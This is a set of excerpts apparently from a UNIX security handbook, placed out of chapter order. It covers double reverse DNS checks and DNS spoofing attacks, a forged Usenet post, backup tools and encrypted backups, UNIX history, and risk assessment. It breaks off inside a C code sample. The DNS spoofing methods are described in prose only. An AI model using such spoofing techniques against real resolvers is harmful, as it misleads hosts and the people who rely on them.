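The following Bourne shell fragment sketches the idea behind a double reverse lookup. It assumes that the host utility from the BIND distribution is installed and that its output can be parsed as shown; the IP address is only an example, and a real check would have to handle multiple PTR and A records:

#!/bin/sh
# Double reverse lookup sketch: map the address to a name, then map the
# name back to addresses and check that the original address is among them.
IP=192.0.2.10     # address of the incoming connection (example)

NAME=`host $IP | awk '{ print $NF }' | sed 's/\.$//'`
echo "PTR record claims: $NAME"

if host "$NAME" | grep "$IP" > /dev/null
then
        echo "forward and reverse lookups agree"
else
        echo "MISMATCH: do not trust the hostname $NAME"
fi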

An attacker has more trouble spoofing a double reverse lookup, but the possibility still exists. Some of these attacks are:

Client flooding
Because DNS uses UDP, an attacker can easily flood a host that is making a nameserver request with thousands of invalid responses. These can be constructed so as to appear to come from the DNS server. The client performing a DNS lookup will most likely accept the attacker's response, rather than the legitimate response from the authentic nameserver.

Bogus nameserver cache loading
Some nameservers will cache any response that they receive, whether it was requested or not. You can load these nameservers with incorrect IP address translations as part of a response to some other request.

Rogue DNS servers
The fact that someone runs a nameserver on his or her machine doesn't mean you can trust the results. By appropriately modifying the responses of a nameserver for one domain to respond to requests with inappropriate information, the maintainer of a real DNS server can taint the responses to clients.

Firewalls (described in Chapter 21) can provide some (small) degree of protection against a few DNS attacks. Nevertheless, real safety relies on not using IP addresses or hostnames for authentication.

16.3.3 Authentication

Most IP services do not provide a strong system for positive authentication. As a result, an attacker (or a prankster) can transmit information and claim that it comes from another source.

The lack of positive authentication presents problems especially for services such as DNS (see above), electronic mail, and Usenet. In all of these services, the recipient of a message, be it a machine or a person, is likely to take positive action based on the content of a message, whether or not the message sender is properly authenticated.

One of the best-known cases of a fraudulently published Usenet message appears below. It was not written by Gene Spafford; instead, it was created and posted to the Usenet by Chuq von Rospach.

Path: purdue!umd5!ames!mailrus!umix!uunet!seismo!sundc!pitstop!sun!moscvax!perdue!spaf
From: spaf@cs.purdue.EDU (Gene Spafford)
Newsgroups: news.announce.important
Subject: Warning: April Fools Time again (forged messages on loose)
Message-ID:
Date: 1 Apr 88 00:00:00 GMT
Expires: 1 May 88 00:00:00 GMT
Followup-To: news.admin
Organization: Dept. of Computer Sciences, Purdue Univ.
Lines: 25
Approved: spaf@cs.purdue.EDU

Warning: April 1 is rapidly approaching, and with it comes a USENET tradition. On April Fools day comes a series of forged, tongue-in-cheek messages, either from non-existent sites or using the name of a Well Known USENET person. In general, these messages are harmless and meant as a joke, and people who respond to these messages without thinking, either by flaming or otherwise responding, generally end up looking rather silly when the forgery is exposed.

So, for the next couple of weeks, if you see a message that seems completely out of line or is otherwise unusual, think twice before posting a followup or responding to it; it's very likely a forgery.

There are a few ways of checking to see if a message is a forgery. These aren't foolproof, but since most forgery posters want people to figure it out, they will allow you to track down the vast majority of forgeries:

* Russian computers. For historic reasons most forged messages have as part of their Path: a non-existent (we think!) russian computer, either kremvax or moscvax. Other possibilities are nsacyber or wobegon. Please note, however, that walldrug is a real site and isn't a forgery.

* Posted dates. Almost invariably, the date of the posting is forged to be April 1.

* Funky Message-ID. Subtle hints are often lodged into the Message-Id, as that field is more or less an unparsed text string and can contain random information. Common values include pi, the phone number of the red phone in the white house, and the name of the forger's parrot.

* Subtle mispellings. Look for subtle misspellings of the host names in the Path: field when a message is forged in the name of a Big Name USENET person. This is done so that the person being forged actually gets a chance to see the message and wonder when he actually posted it.

Forged messages, of course, are not to be condoned. But they happen, and it's important for people on the net not to over-react. They happen at this time every year, and the forger generally gets their kick from watching the novice users take the posting seriously and try to flame their tails off. If we can keep a level head and not react to these postings, they'll taper off rather quickly and we can return to the normal state of affairs: chaos.

Thanks for your support.

Gene Spafford, Spokeman, The Backbone Cabal.

The April 1 post is funny, because it contains all of the signs of a forged message that it claims to warn the reader about. But other forged messages are not quite so friendly. Beware!


Chapter 7
Backups

7.4 Software for Backups

There are a number of software packages that allow you to perform backups. Some are vendor specific, and others are quite commonly available. Each may have particular benefits in a particular environment. We'll outline a few of the more common ones here, including a few that you might not otherwise consider. You should consult your local documentation to see if there are special programs available with your system.

Beware Backing up Files with Holes

Standard UNIX files are direct-access files; in other words, you can specify an offset from the beginning of the file, and then read and write from that location. If you ever had experience with older mainframe systems that only allowed files to be accessed sequentially, you know how important random access is for many things, including building random-access databases.

An interesting case occurs when a program references beyond the "end" of the file and then writes. What goes into the space between the old end-of-file and the data just now written? Zero-filled bytes would seem to be appropriate, as there is really nothing there.

Now, consider that the span could be millions of bytes long, and there is really nothing there. If UNIX were to allocate disk blocks for all that space, it could possibly exhaust the free space available. Instead, the inode and file data pointers are set internally so that only the blocks needed to hold written data are allocated. The remaining span represents a hole that UNIX remembers. Attempts to read any of those blocks simply return zero values. Attempts to write any location in the hole result in a real disk block being allocated and written, so everything continues to appear normal. (One way to identify these files is to compare the size reported by ls -l with the size reported by ls -s.)

Small files with large holes can be a serious concern to backup software, depending on how your software handles them. Simple copy programs will try to read the file sequentially, and the result is a stream with lots of zero bytes. When copied into a new file, blocks are actually allocated for the whole span and lots of space may be wasted. More intelligent programs, like dump, bypass the normal file system and read the actual inode and set of data pointers. Such programs only save and restore the actual blocks allocated, thus saving both tape and file storage.

Keep these comments in mind if you try to copy or archive a file that appears to be larger in size than the disk it resides on. Copying a file with holes to another device can cause you to suddenly run out of disk space.
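A quick way to see the effect is to create a file with a large hole and compare the two size reports. The path is only an example, and the exact numbers will vary from system to system:

% dd if=/dev/zero of=/tmp/holey bs=1 count=1 seek=1000000
1+0 records in
1+0 records out
% ls -l /tmp/holey
-rw-r--r-- 1 jason 1000001 Jul 12 12:19 /tmp/holey
% ls -s /tmp/holey
2 /tmp/holey

The logical size reported by ls -l is about a megabyte, but ls -s shows that only a couple of blocks are actually allocated.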



7.4.1 Simple Local Copies

The simplest form of backup is to make simple copies of your files and directories. You might make those copies to local disk, to removable disk, to tape, or to some other media. Some file copy programs will properly duplicate modification and access times, and copy owner and protection information, if you are the super-user or the files belong to you. They seldom recreate links, however. Examples include:

cp
The standard command for copying individual files. Some versions support a -r option to copy an entire directory tree.

dd
This command can be used to copy a whole disk partition at one time by specifying the names of partition device files as arguments. This process should be done with great care if the source partition is mounted: in such a case, the device should be the block version of the disk rather than the character version. Never copy onto a mounted partition - unless you want to destroy the partition and cause an abrupt system halt! (A brief example appears after this list.)
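For instance, an unmounted partition might be saved to a file on another disk like this; the device and file names are only examples, and an unmounted partition can safely be read through its raw (character) device:

# dd if=/dev/rsd0g of=/backup/sd0g.image bs=64k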

7.4.2 Simple Archives

There are several programs that are available to make simple archives packed into disk files or onto tape. These are usually capable of storing all directory information about a file, and restoring much of it if the correct options are used. Running these programs may result in a change of either (or both) the atime and the ctime of items archived, however.[8]

[8] See Chapter 5, The UNIX Filesystem, for information about these file characteristics.

ar
Simple file archiver. Largely obsolete for backups (although still used for creating UNIX libraries).

tar
Simple tape archiver. Can create archives to files, tapes, or elsewhere. This seems to be the most widely used simple archive program.

cpio
Another simple archive program. This program can create portable archives in plain ASCII of even binary files, if invoked with the correct options. (cpio does record empty directories.)

pax
The portable archiver/exchange tool, which is defined in the POSIX standard. This program combines tar and cpio functionality, and uses tar as its default file format.


7.4.3 Specialized Backup Programs

There are several dedicated backup programs.

dump/restore
This program is the "classic" one for archiving a whole partition at once, and for the associated file restorations. Many versions of this program exist, but all back up from the raw disk device, thus bypassing calls that would change any of the times present in inodes for files and directories. This program can also make the backups quite fast.

backup
Some SVR4 systems have a suite of programs named, collectively, backup. These are also designed specifically to do backups of files and whole filesystems.

7.4.4 Encrypting Your Backups

You can improvise your own backup encryption if you have an encryption program that can be used as a filter and you use a backup program that can write to a file, such as the dump, cpio, or tar commands. For example, to make an encrypted tape archive using the tar command and the des encryption program, you might use the following command:

# tar cf - dirs and files | des -ef | dd bs=10240 of=/dev/rmt8

Although software encryption has potential drawbacks (for example, the software encryption program can be compromised so that it records all passwords), this method is certainly preferable to storing sensitive information on unencrypted backups.

Here is an example: suppose you have a des encryption program called des which prompts the user for a key and then encrypts its standard input to standard output.[9] You could use this program with the dump (called ufsdump under Solaris) program to back up the filesystem /u to the device /dev/rmt8 with the command:

[9] Some versions of the des command require that you specify the "-f -" option to make the program run as a filter.

# dump f - /u | des -e | dd bs=10240 of=/dev/rmt8
Enter key:

If you wanted to back up the filesystem with tar, you would instead use the command:

# tar cf - /u | des -e | dd bs=10240 of=/dev/rmt8
Enter key:

To read these files back, you would use the following command sequences:

# dd bs=10240 if=/dev/rmt8 | des -d | restore fi -
Enter key:

and:

# dd bs=10240 if=/dev/rmt8 | des -d | tar xpBfv -
Enter key:



In both of these examples, the backup programs are instructed to send the backup of the file systems to standard output. The output is then encrypted and written to the tape drive.

NOTE: If you encrypt the backup of a filesystem and you forget the encryption key, the information stored on the backup will be unusable.

7.4.5 Backups Across the Net

A few programs can be used to do backups across a network link. Thus, you can do backups on one machine, and write the results to another. An obvious example would be using a program that can write to stdout, and then piping the output to a remote shell. Some programs are better integrated with networks, however.

rdump/rrestore
These are network versions of the dump and restore commands. rdump uses a dedicated process on a machine that has a tape drive, and sends the data to that process. Thus, it allows a tape drive to be shared by a whole network of machines. (A sample invocation appears after this list.)

rcp
This command enables you to copy a file or a whole directory tree to a remote machine.

ftp
Although the venerable ftp command can be used to copy files, it is slow and cumbersome to use for many files, and it does not work well with directories. In addition, the standard ftp does not understand UNIX device files, sockets,[10] symbolic links, or other items that one might wish to back up.

[10] Why back up sockets? Because some programs depend upon them.

rdist
This program is often used to keep multiple machines in synchronization by copying files from a master machine to a set of slaves. However, the program primarily works by copying only files that have changed from a master set, and can therefore update a backup set of files from a working version. Thus, instead of distributing new files, the program archives them. rdist can also be run in a mode that simply prints the names of files that differ between an old set and a destination machine.
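For example, a level 0 dump of /u written to a tape drive on another machine might look like the following; the hostname and device name are only examples:

# rdump 0uf tapehost:/dev/rmt8 /u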

7.4.6 Commercial Offerings

There are several commercial backup and restore utilities. Several of them feature special options that make indexing files or staging little-used files to slower storage (such as write-once optical media) easier. Unfortunately, lack of portability across multiple platforms, and compatibility with sites that may not have the software installed, might be drawbacks for many users. Be sure to fully evaluate the conditions under which you'll need to use the program and decide on a backup strategy before purchasing the software.


7.4.7 inode Modification Times

Most backup programs check the access and modification times on files and directories to determine which entries need to be stored to the archive. Thus, you can force an entry to be included (or not included) by altering these times. The touch command enables you to do so quickly and efficiently.
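For example, updating the modification time of a file makes most incremental backup programs pick it up on the next run; the filename is only an example:

% touch /u/project/notes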

However, many programs that do backups will cause the access time on files and directories to be updated when they are read for the backup. As this behavior might break other software that depends on the access times, these programs sometimes use the utime system call to reset the access time back to the value it had prior to the backup.

Unfortunately, using the utime() system call causes the inode change time, the ctime, to be altered. There is no filesystem call to set the ctime back to what it was, so the ctime remains altered. This is a bane to system security investigations, because it wipes out an important piece of information about files that may have been altered by an intruder.

For this reason, we suggest that you determine how any candidate backup program behaves in this regard, and choose one that does not alter file times. When considering a commercial backup system (or when designing your own), it is wise to avoid a system that changes the ctime or atime stored in the inode.

If you cannot use a backup system that directly accesses the raw disk partitions, you have two other choices:

1. You can unmount your disks and remount them read-only before backing them up. This procedure will allow you to use programs such as cpio or tar without changing the atime.

2. If your system supports NFS loopback mounts (such as Solaris or SunOS), you can create a read-only NFS loopback mount for each disk. Then you can back up the NFS-mounted disk, rather than the real device. (A brief sketch appears after this list.)
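A sketch of the second approach follows, using SunOS/Solaris-style commands and assuming that /u has already been exported to the local host; the paths and device name are only examples:

# mount -o ro localhost:/u /backups/u
# tar cf /dev/rmt8 /backups/u
# umount /backups/u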


Chapter 1
Introduction

1.3 History of UNIX

The roots of UNIX[4] go back to the mid-1960s, when American Telephone and Telegraph, Honeywell, General Electric, and the Massachusetts Institute of Technology embarked on a massive project to develop an information utility. The project, called MULTICS (standing for Multiplexed Information and Computing Service), was heavily funded by the Department of Defense Advanced Research Projects Agency (ARPA, once also known as DARPA). Most of the research took place in Cambridge, Massachusetts, at MIT.

[4] A more comprehensive history of UNIX, from which some of the following is derived, is Peter Salus's book, A Quarter Century of UNIX, mentioned in Appendix D.

MULTICS was a modular system built from banks of high-speed processors, memory, and communications equipment. By design, parts of the computer could be shut down for service without affecting other parts or the users. The goal was to provide computer service 24 hours a day, 365 days a year - a computer that could be made faster by adding more parts, much in the same way that a power plant can be made bigger by adding more furnaces, boilers, and turbines. Although this level of processing is simply assumed today, such a capability was not available when MULTICS was begun.

MULTICS was also designed with military security in mind. MULTICS was designed both to be resistant to external attacks and to protect the users on the system from each other. MULTICS was to support the concept of multilevel security. Top Secret, Secret, Confidential, and Unclassified information could all coexist on the same computer. The MULTICS operating system was designed to prevent information that had been classified at one level from finding its way into the hands of someone who had not been cleared to see that information. MULTICS eventually provided a level of security and service that is still unequaled by many of today's computer systems - including, perhaps, UNIX.

In 1969, MULTICS was far behind schedule. Its creators had promised far more than they could deliver within the projected time frame. Already at a disadvantage because of the distance between its New Jersey laboratories and MIT, AT&T decided to pull out of the MULTICS Project.

That year Ken Thompson, an AT&T researcher who had worked on the MULTICS Project, took over an unused PDP-7 computer to pursue some of the MULTICS ideas on his own. Thompson was soon joined by Dennis Ritchie, who had also worked on MULTICS. Peter Neumann suggested the name UNIX for the new system. The name was a pun on the name MULTICS and a backhanded slap at the project that was continuing in Cambridge (and indeed continued for another decade and a half). Whereas MULTICS tried to do many things, UNIX tried to do one thing well: run programs. The concept of strong security was not part of this goal.

The smaller scope was all the impetus that the researchers needed; an early version of UNIX was operational several months before MULTICS. Within a year, Thompson, Ritchie, and others rewrote UNIX for Digital's new PDP-11 computer.

As AT&T's scientists added features to their system throughout the 1970s, UNIX evolved into a programmer's dream. The system was based on compact programs, called tools, each of which performed a single function. By putting tools together, programmers could do complicated things. UNIX mimicked the way programmers thought. To get the full functionality of the system, users needed access to all of these tools - and in many cases, to the source code for the tools as well. Thus, as the system evolved, nearly everyone with access to the machines aided in the creation of new tools and in the debugging of existing ones.

In 1973, Thompson rewrote most of UNIX in Ritchie's newly invented C programming language. C was designed to be a simple, portable language. Programs written in C could be moved easily from one kind of computer to another - as was the case with programs written in other high-level languages like FORTRAN - yet they ran nearly as fast as programs coded directly in a computer's native machine language.

At least, that was the theory. In practice, every different kind of computer at Bell Labs had its own operating system. C programs written on the PDP-11 could be recompiled on the lab's other machines, but they didn't always run properly, because every operating system performed input and output in slightly different ways. Mike Lesk developed a "portable I/O library" to overcome some of the incompatibilities, but many remained. Then, in 1977, the group realized that it might be easier to port the UNIX operating system itself rather than trying to port all of the libraries. UNIX was first ported to the lab's Interdata 8/32, a microcomputer similar to the PDP-11. In 1978, the operating system was ported to Digital's new VAX minicomputer. UNIX still remained very much an experimental operating system. Nevertheless, UNIX had become a popular operating system in many universities and was already being marketed by several companies. UNIX was suddenly more than just a research curiosity.

Indeed, as early as 1973, there were more than 16 different AT&T or Western Electric sites outside Bell Labs running the operating system. UNIX soon spread even further. Thompson and Ritchie presented a paper on the operating system at the ACM Symposium on Operating System Principles (SOSP) in October 1973. Within a matter of months, sites around the world had obtained and installed copies of the system. Even though AT&T was forbidden under the terms of its 1956 Consent Decree with the U.S. Federal government from advertising, marketing, or supporting computer software, demand for UNIX steadily rose. By 1977, more than 500 sites were running the operating system; 125 of them were at universities in the U.S. and more than 10 foreign countries. 1977 also saw the first commercial support for UNIX, then at Version 6.

At most sites, and especially at universities, the typical <strong>UNIX</strong> environment was like that inside Bell<br />

Labs: the machines were in well-equipped labs with restricted physical access. The users who made<br />

extensive use of the machines were people who had long-term access and who usually made significant<br />

modifications to the operating system and its utilities to provide additional functionality. They did not<br />

need to worry about security on the system because only authorized individuals had access to the<br />

machines. In fact, implementing security mechanisms often hindered the development of utilities and<br />

customization of the software. One of the authors worked in two such labs in the early 1980s, and one<br />

location viewed having a password on the root account as an annoyance because everyone who could get<br />

to the machine was authorized to use it as the superuser!<br />

This environment was perhaps best typified by the development at the University of California at<br />

Berkeley. Like other schools, Berkeley had paid $400 for a tape that included the complete source code<br />

to the operating system. Instead of merely running <strong>UNIX</strong>, two of Berkeley's bright graduate students, Bill<br />

Joy and Chuck Haley, started making significant modifications. In 1978, Joy sent out 30 copies of the "<br />

Berkeley Software Distribution (BSD)," a collection of programs and modifications to the <strong>UNIX</strong> system.<br />

The charge: $50 for media and postage.<br />

Over the next six years, in an effort funded by ARPA, the so-called BSD <strong>UNIX</strong> grew into an operating<br />

system of its own that offered significant improvements over AT&T's. For example, a programmer using<br />

BSD <strong>UNIX</strong> could switch between multiple programs running at the same time. AT&T's <strong>UNIX</strong> allowed<br />

the names on files to be only 14 letters long, but Berkeley's allowed names of up to 255 characters. But<br />

perhaps the most important of the Berkeley improvements was the BSD 4.2 <strong>UNIX</strong> networking software,<br />

which made it easy to connect <strong>UNIX</strong> computers to local area[5] networks (LANs). For all of these<br />

reasons, the Berkeley version of <strong>UNIX</strong> became very popular with the research and academic<br />

communities.<br />

[5] And we stress, local area.<br />

About the same time, AT&T had been freed from its restrictions on developing and marketing source<br />

code as a result of the enforced divestiture of the phone company. Executives realized that they had a<br />

strong potential product in <strong>UNIX</strong>, and they set about developing it into a more polished commercial<br />

product. This led to an interesting change in the numbering of the BSD releases.<br />

Berkeley 4.2 <strong>UNIX</strong> should have been numbered 5.0. However, by the time that the 4.2 Berkeley<br />

Software Distribution was ready to be released, friction was growing between the developers at Berkeley<br />

and the management of AT&T, who owned the <strong>UNIX</strong> trademark and rights to the operating system. As<br />

<strong>UNIX</strong> had grown in popularity, AT&T executives became increasingly worried that, with the popularity<br />

of Berkeley <strong>UNIX</strong>, AT&T was on the verge of losing control of a valuable property right. To retain<br />

control of <strong>UNIX</strong>, AT&T formed the <strong>UNIX</strong> Support Group (USG) to continue development and<br />

marketing of the <strong>UNIX</strong> operating system. USG proceeded to christen a new version of <strong>UNIX</strong> as AT&T<br />

System V, and declare it the new "standard"; AT&T representatives referred to BSD <strong>UNIX</strong> as<br />

nonstandard and incompatible.<br />

Under Berkeley's license with AT&T, the university was free to release updates to existing AT&T <strong>UNIX</strong><br />

customers. But if Berkeley had decided to call its new version of <strong>UNIX</strong> "5.0," it would have needed to<br />

renegotiate its licensing agreement to distribute the software to other universities and companies. Thus,<br />

Berkeley released BSD 4.2. By calling the new release of the operating system "4.2," they pretended that<br />

the system was simply a minor update.<br />

As interest in <strong>UNIX</strong> grew, the industry was beset by two competing versions of <strong>UNIX</strong>: Berkeley <strong>UNIX</strong><br />

and AT&T's System V. The biggest non-university proponent of Berkeley <strong>UNIX</strong> was Sun Microsystems.<br />

Founded in part by graduates from Berkeley's computer science program, Sun's SunOS operating system<br />

was, for all practical purposes, Berkeley's operating system, as it was based on BSD 4.1c. Many people<br />

believe that Sun's adoption of Berkeley <strong>UNIX</strong> was responsible for the early success of the company.<br />

Another early adopter was the Digital Equipment Corporation, whose Ultrix operating system was also<br />

quite similar to Berkeley <strong>UNIX</strong> - not surprising as it was based on BSD 4.2.<br />

As other companies entered the <strong>UNIX</strong> marketplace, they faced a question of which version of <strong>UNIX</strong> to<br />

adopt. On the one hand, there was Berkeley <strong>UNIX</strong>, which was preferred by academics and developers,<br />

but which was "unsupported" and was frighteningly similar to the operating system used by Sun, soon to<br />

become the market leader. On the other hand, there was AT&T System V <strong>UNIX</strong>, which AT&T, the<br />

owner of <strong>UNIX</strong>, was proclaiming as the operating system "standard." As a result, most computer<br />

manufacturers that tried to develop <strong>UNIX</strong> in the mid-to-late 1980s - including Data General, IBM,<br />

Hewlett Packard, and Silicon Graphics - adopted System V as their standard. A few tried to do both,<br />

coming out with systems that had dual "universes." A third version of <strong>UNIX</strong>, called Xenix, was<br />

developed by Microsoft in the early 1980s and licensed to the Santa Cruz Operation (SCO). Xenix was<br />

based on AT&T's older System III operating system, although Microsoft and SCO had updated it<br />

throughout the 1980s, adding some new features, but not others.<br />

As <strong>UNIX</strong> started to move from the technical to the commercial markets in the late 1980s, this conflict of<br />

operating system versions was beginning to cause problems for all vendors. Commercial customers<br />

wanted a standard version of <strong>UNIX</strong>, hoping that it could cut training costs and guarantee software<br />

portability across computers made by different vendors. And the nascent <strong>UNIX</strong> applications market<br />

wanted a standard version, believing that this would make it easier for them to support multiple<br />

platforms, as well as compete with the growing PC-based market.<br />

The first two versions of <strong>UNIX</strong> to merge were Xenix and AT&T's System V. The resulting version,<br />

UNIX System V/386 Release 3.2, incorporated all the functionality of traditional UNIX System V and

Xenix. It was released in August 1988 for 80386-based computers.<br />

In the spring of 1988, AT&T and Sun Microsystems signed a joint development agreement to merge the<br />

two versions of <strong>UNIX</strong>. The new version of <strong>UNIX</strong>, System V Release 4 (SVR4), was to have the best<br />

features of System V and Berkeley <strong>UNIX</strong> and be compatible with programs written for either. Sun<br />

proclaimed that it would abandon its SunOS operating system and move its entire user base over to its<br />

own version of the new operating system, which it would call Solaris.[6]<br />

[6] Some documentation labels the combined versions of SunOS and AT&T System V as<br />

SunOS 5.0, and uses the name Solaris to designate SunOS 5.0 with the addition of<br />

OpenWindows and other applications.<br />

The rest of the <strong>UNIX</strong> industry felt left out and threatened by the Sun/AT&T announcement. Companies<br />

including IBM and Hewlett-Packard worried that, because they were not a part of the SVR4 development<br />

effort, they would be at a disadvantage when the new operating system was finally released. In May<br />

1988, seven of the industry's <strong>UNIX</strong> leaders - Apollo Computer, Digital Equipment Corporation,<br />

Hewlett-Packard, IBM, and three major European computer manufacturers - announced the formation of<br />

the Open Software Foundation (OSF).<br />

The stated purpose of OSF was to wrest control of <strong>UNIX</strong> away from AT&T and put it in the hands of a<br />

not-for-profit industry coalition, which would be chartered with shepherding the future development of<br />

<strong>UNIX</strong> and making it available to all under uniform licensing terms. OSF decided to base its version of<br />

<strong>UNIX</strong> on AIX, then moved to the MACH kernel from Carnegie Mellon University, and an assortment of<br />

<strong>UNIX</strong> libraries and utilities from HP, IBM, and Digital. To date, the result of this effort has not been<br />

widely adopted or embraced by all the participants. The OSF operating system (OSF/1) was late in<br />

coming, so some companies built their own (e.g., IBM's AIX). Others adopted SVR4 after it was<br />

released, in part because it was available, and in part because AT&T and Sun went their separate ways -<br />

thus ending the threat against which OSF had been rallied.<br />

As of 1996, the <strong>UNIX</strong> wars are far from settled, but they are much less important than they seemed in the<br />

early 1990s. In 1993, AT&T sold <strong>UNIX</strong> Systems Laboratories (USL) to Novell, having succeeded in<br />

making SVR4 an industry standard, but having failed to make significant inroads against Microsoft's<br />

Windows operating system on the corporate desktop. Novell then transferred the <strong>UNIX</strong> trademark to the<br />

X/Open Consortium, which is granting use of the name to systems that meet its 1170 test suite. Novell<br />

subsequently sold ownership of the <strong>UNIX</strong> source code to SCO in 1995, effectively disbanding USL.<br />

Although Digital Equipment Corporation provides Digital <strong>UNIX</strong> (formerly OSF/1) on its workstations,<br />

Digital's strongest division isn't workstations, but its PC division. Despite the fact that Sun's customers<br />

said that they wanted System V compatibility, Sun had difficulty convincing the majority of its<br />

customers to actually use its Solaris operating system during the first few years of its release (and many<br />

users still complain about the switch). BSD/OS by BSD Inc., a commercial version of BSD 4.4, is used<br />

in a significant number of network firewall systems, VAR systems, and academic research labs.<br />

Meanwhile, a free <strong>UNIX</strong>-like operating system - Linux - has taken the hobbyist and small-business<br />

market by storm. Several other free implementations of <strong>UNIX</strong> and <strong>UNIX</strong>-like systems for PCs -<br />

including versions based on BSD 4.3 and 4.4, and the Mach system developed at Carnegie Mellon<br />

University - have also gained widespread use. Figure 1.1 shows the current situation with versions of<br />

<strong>UNIX</strong>.<br />

Figure 1.1: Versions of <strong>UNIX</strong><br />

Despite the lack of unification, the number of <strong>UNIX</strong> systems continues to grow. As of the mid 1990s,<br />

<strong>UNIX</strong> runs on an estimated five million computers throughout the world. Versions of <strong>UNIX</strong> run on<br />

nearly every computer in existence, from small IBM PCs to large supercomputers such as Crays.<br />

Because it is so easily adapted to new kinds of computers, <strong>UNIX</strong> is the operating system of choice for<br />

many of today's high-performance microprocessors. Because a set of versions of the operating system's<br />

source code is readily available to educational institutions, <strong>UNIX</strong> has also become the operating system<br />

of choice for educational computing at many universities and colleges. It is also popular in the research<br />

community because computer scientists like the ability to modify the tools they use to suit their own<br />

needs.<br />

<strong>UNIX</strong> has become popular too, in the business community. In large part this popularity is because of the<br />

increasing numbers of people who have studied computing using a <strong>UNIX</strong> system, and who have sought<br />

to use <strong>UNIX</strong> in their business applications. Users who become familiar with <strong>UNIX</strong> tend to become very<br />

attached to the openness and flexibility of the system. The client-server model of computing has also<br />

become quite popular in business environments, and <strong>UNIX</strong> systems support this paradigm well (and<br />

there have not been too many other choices).<br />

Furthermore, a set of standards for a <strong>UNIX</strong>-like operating system (including interface, library, and<br />

behavioral characteristics) has emerged, although considerable variability among implementations<br />

remains. This set of standards is POSIX, originally initiated by IEEE, but also adopted as ISO/IEC 9945.<br />

People can now buy different machines from different vendors, and still have a common interface.<br />

Efforts are also focused on putting the same interface on VMS, Windows NT, and other platforms quite<br />

different from <strong>UNIX</strong> "under the hood." Today's <strong>UNIX</strong> is based on many such standards, and this greatly<br />

increases its attractiveness as a common platform base in business and academia alike. <strong>UNIX</strong> vendors<br />

and users are the leaders of the "open systems" movement: without <strong>UNIX</strong>, the very concept of "open<br />

systems" would probably not exist. No longer do computer purchases lock a customer into a<br />

multi-decade relationship with a single vendor.<br />



Chapter 2
Policies and Guidelines

2.2 Risk Assessment

The first step to improving the security of your system is to answer these basic questions:<br />

● What am I trying to protect?
● What do I need to protect against?
● How much time, effort, and money am I willing to expend to obtain adequate protection?

These questions form the basis of the process known as risk assessment.<br />

Risk assessment is a very important part of the computer security process. You cannot protect yourself if<br />

you do not know what you are protecting yourself against! After you know your risks, you can then plan<br />

the policies and techniques that you need to implement to reduce those risks.<br />

For example, if there is a risk of a power failure and if availability of your equipment is important to you,<br />

you can reduce this risk by purchasing an uninterruptible power supply (UPS).

2.2.1 A Simple Assessment Strategy<br />

We'll present a simplistic form of risk assessment to give you a starting point. This example may be more<br />

complex than you really need for a home computer system or very small company. The example is also<br />

undoubtedly insufficient for a large company, a government agency, or a major university. In cases such<br />

as those, you need to consider specialized software to do assessments, and the possibility of hiring an<br />

outside consulting firm with expertise in risk assessment.<br />

The three key steps in doing a risk assessment are:<br />

1. Identifying assets
2. Identifying threats
3. Calculating risks

There are many ways to go about this process. One method with which we have had great success is a<br />

series of in-house workshops. Invite a cross-section of users, managers, and executives from throughout<br />

your organization. Over a series of weeks, compose your lists of assets and threats. Not only will this<br />

process help to build a more complete set of lists, it will also help to increase awareness of security in<br />

everyone who attends.<br />

2.2.1.1 Identifying assets<br />

Draw up a list of items you need to protect. This list should be based on your business plan and common<br />

sense. The process may require knowledge of applicable law, a complete understanding of your facilities,<br />

and knowledge of your insurance coverage.<br />

Items to protect include tangibles (disk drives, monitors, network cables, backup media, manuals) and<br />

intangibles (ability to continue processing, public image, reputation in your industry, access to your<br />

computer, your system's root password). The list should include everything that you consider of value.<br />

To determine if something is valuable, consider what the loss or damage of the item might be in terms of<br />

lost revenue, lost time, or the cost of repair or replacement.<br />

Some of the items that should probably be in your asset list include:<br />

Tangibles:

● Computers
● Proprietary data
● Backups and archives
● Manuals, guides, books
● Printouts
● Commercial software distribution media
● Communications equipment and wiring
● Personnel records
● Audit records

Intangibles:

● Safety and health of personnel
● Privacy of users
● Personnel passwords
● Public image and reputation
● Customer/client goodwill
● Processing availability
● Configuration information

You should take a larger view of these and related items rather than simply considering the computer<br />

aspects. If you are concerned about someone reading your internal financial reports, you should be<br />

concerned regardless of whether they read them from a discarded printout or snoop on your email.<br />

2.2.1.2 Identifying threats<br />

The next step is to determine a list of threats to your assets. Some of these threats will be environmental,<br />

and include fire, earthquake, explosion, and flood. They should also include very rare but possible events<br />

such as building structural failure, or discovery of asbestos in your computer room that requires you to<br />

vacate the building for a prolonged time. Other threats come from personnel, and from outsiders. We list<br />

some examples here:<br />

● Illness of key people
● Simultaneous illness of many personnel (e.g., flu epidemic)
● Loss (resignation/termination/death) of key personnel
● Loss of phone/network services
● Loss of utilities (phone, water, electricity) for a short time
● Loss of utilities (phone, water, electricity) for a prolonged time
● Lightning strike
● Flood
● Theft of disks or tapes
● Theft of key person's laptop computer
● Theft of key person's home computer
● Introduction of a virus
● Computer vendor bankruptcy
● Bugs in software
● Subverted employees
● Subverted third-party personnel (e.g., vendor maintenance)
● Labor unrest
● Political terrorism
● Random "hackers" getting into your machines
● Users posting inflammatory or proprietary information to the Usenet

2.2.1.3 Quantifying the threats<br />

After you have identified the threats, you need to estimate the likelihood of each occurring. These threats<br />

may be easiest to estimate on a year-by-year basis.<br />

Quantifying the threat of a risk is hard work. You can obtain some estimates from third parties, such as<br />

insurance companies. If the event happens on a regular basis, you can estimate it based on your records.<br />

Industry organizations may have collected statistics or published reports. You can also base your<br />

estimates on educated guesses extrapolated from past experience. For instance:<br />

● Your power company can provide an official estimate of the likelihood that your building would suffer a power outage during the next year. They may also be able to quantify the risk of an outage lasting a few seconds vs. the risk of an outage lasting minutes or hours.
● Your insurance carrier can provide you with actuarial data on the probability of death of key personnel based on age and health.[3]
  [3] Note the difference in this estimate between smokers and nonsmokers. This difference may present a strategy for risk abatement.
● Your personnel records can be used to estimate the probability of key computing employees quitting.
● Past experience and best guess can be used to estimate the probability of a serious bug being discovered in your vendor software during the next year (probably 100%).

If you expect something to happen more than once per year, then record the number of times that you<br />

expect it to happen. Thus, you may expect a serious earthquake only once every 100 years (1% in your<br />

list), but you may expect three serious bugs in sendmail to be discovered during the next year (300%).<br />
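
To see how such annualized figures get used, the short sketch below multiplies each threat's expected yearly frequency by the estimated cost of one occurrence to produce an expected annual loss, the number you would later weigh against the cost of a safeguard. Every threat name, frequency, and dollar figure in it is invented purely for illustration; substitute values from your own assessment.

/*
 * A minimal sketch of the risk arithmetic described above.  All of the
 * threat names, frequencies, and costs are invented for illustration.
 */
#include <stdio.h>

struct threat {
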